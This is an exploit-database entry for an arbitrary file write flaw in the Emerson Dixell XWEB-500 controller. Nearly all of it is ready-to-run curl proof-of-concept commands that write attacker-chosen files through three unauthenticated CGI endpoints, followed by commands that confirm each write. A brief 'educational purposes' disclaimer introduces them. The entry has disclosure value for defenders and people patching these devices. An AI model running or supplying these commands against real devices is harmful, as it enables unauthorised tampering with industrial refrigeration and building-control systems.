Exploits / Vulnerability Discovered : 2022-01-05 |
Type : remote |
Platform : hardware
This exploit / vulnerability Dixell xweb 500 arbitrary file write is for educational purposes only and if it is used you will do on your own risk!
# Emerson Dixell XWEB-500 is affected by multiple Arbitrary File Write Vulnerability
# Endpoint: logo_extra_upload.cgi
# Here the first line of the POC is the filename and the second one is the content of the file be written
# Write file
echo -e "file.extension\ncontent" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/logo_extra_upload.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream'
# Verify
curl -A Chrome -is "http://[target]:[port]/logo/"
# Endpoint: lo_utils.cgi
# Here ACTION=5 is to enable write mode
echo -e "ACTION=5\nfile.extension\ncontent" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/lo_utils.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream'
# Verify using ACTION=3 to listing resources
echo -e "ACTION=3" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/lo_utils.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream'
# Endpoint: cal_save.cgi
# Here the first line of the POC is the filename and the second one is the content of the file be written
echo -e "file.extension\ncontent" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/cal_save.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream'
# Verify
curl -A Chrome -kis http://[target]:[port]/cgi-bin/cal_dir.cgi